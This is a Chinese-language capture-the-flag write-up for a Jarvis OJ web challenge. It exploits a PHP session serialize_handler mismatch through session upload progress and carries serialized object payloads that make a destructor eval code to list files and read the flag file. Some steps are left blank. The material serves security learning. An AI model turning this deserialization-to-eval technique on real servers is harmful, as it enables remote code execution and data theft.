本文实现以下题目:
http://web.jarvisoj.com:32784/
解题思路:
1.session.upload_progress.enabled=On
当
解题过程如下:
1.打开地址,获取如下源代码
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class
OowoO
{
public
$mdzz;
function
__construct()
{
$this->mdzz = 'phpinfo();';
}
function
__destruct()
{
eval(
$this->mdzz);
}
}
if(isset(
$_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
直接运行如下地址:
http://web.jarvisoj.com:32784/?phpinfo,查看PHPinfo页面,发现php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。
2.利用session.upload_progress.enabled构造session
首先构造上传表单:
<!DOCTYPE html>
<html>
<head>
<title>test XXE</title>
<meta charset="utf-8">
</head>
<body>
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"><!--
不对字符编码-->
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" value="go" />
</form>
</body>
反序列化代码如下:
<?php
classOowoO
{
public$mdzz='print_r(scandir(dirname(__FILE__)));';
}
$obj =newOowoO();
$a = serialize($obj);
var_dump($a);
执行获得序列化值:
O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}
抓包拦截,将文件名修改如下:
可看到服务器端返回相关flag相关文件名为:Here_1s_7he_fl4g_buT_You_Cannot_see.php
获取文件路径:
/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php
运用如下代码构造序列化值,读取flag:
class OowoO
{
public $mdzz='print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));';
}
$obj = new OowoO();
$a = serialize($obj);
var_dump($a);
序列化结果为:
O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";}
重放数据包,获得flag:
